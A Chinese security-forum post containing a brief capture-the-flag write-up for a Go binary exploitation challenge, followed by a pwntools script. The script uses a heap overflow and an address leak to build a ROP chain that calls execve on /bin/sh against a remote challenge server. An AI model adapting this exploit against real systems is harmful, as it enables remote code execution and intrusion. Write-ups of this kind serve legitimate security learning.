首页
社区
课程
招聘
[原创]挖宝WP
2019-3-23 14:02 2611

[原创]挖宝WP

2019-3-23 14:02
2611
golang pwn
堆溢出任意地址分配到retn附近,单字节溢出读到process base并能再次ROP,再次调用syscalll的ROP调用execve getshell
from pwn import *

def write_a(content):
f.sendlineafter(">>","a")
f.sendlineafter(">>","d")
f.sendlineafter(">>",content.ljust(48,'\x00')+p64(addr))
#f=process("./trepwn",env={'LD_PRELOAD':'./libc.so'})
f=remote("211.159.175.39",8787)
f.sendlineafter("name :","koocola")
for i in range(5):
f.sendlineafter(">>","d")
#gdb.attach(proc.pidof(f)[0],"b* 0x555555554000+0xd72d6")
#f.sendlineafter(">>","\x00"*48+p64(0xc82003fcd0))
f.sendlineafter(">>","\x00"*48+p64(0xc82003fcd0+0x2000))
write_a("\x48"*17)
f.recvuntil("journey!\n")
f.recv(16)
#f.recvuntil("message: ")
base_addr=u64(f.recv(6).ljust(8,'\0'))-0xd744d
success("process base :"+hex(base_addr))
#payload="m"*0x10+p64(base_addr+0x186600)+p64(59)+p64(0xc82003fcd0+0x2000+0x40)+p64(0)+p64(0)+"/bin/sh\0"
payload="m"*0x10+p64(base_addr+0x18557c)+p64(59)+p64(0xc82003fcd0+0x2000+0x38)+p64(0)+p64(0)+"/bin/sh\0"
f.sendlineafter(">>",payload)
f.interactive()


[培训]科锐软件逆向50期预科班报名即将截止,速来!!! 50期正式班报名火爆招生中!!!

收藏
免费 1
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回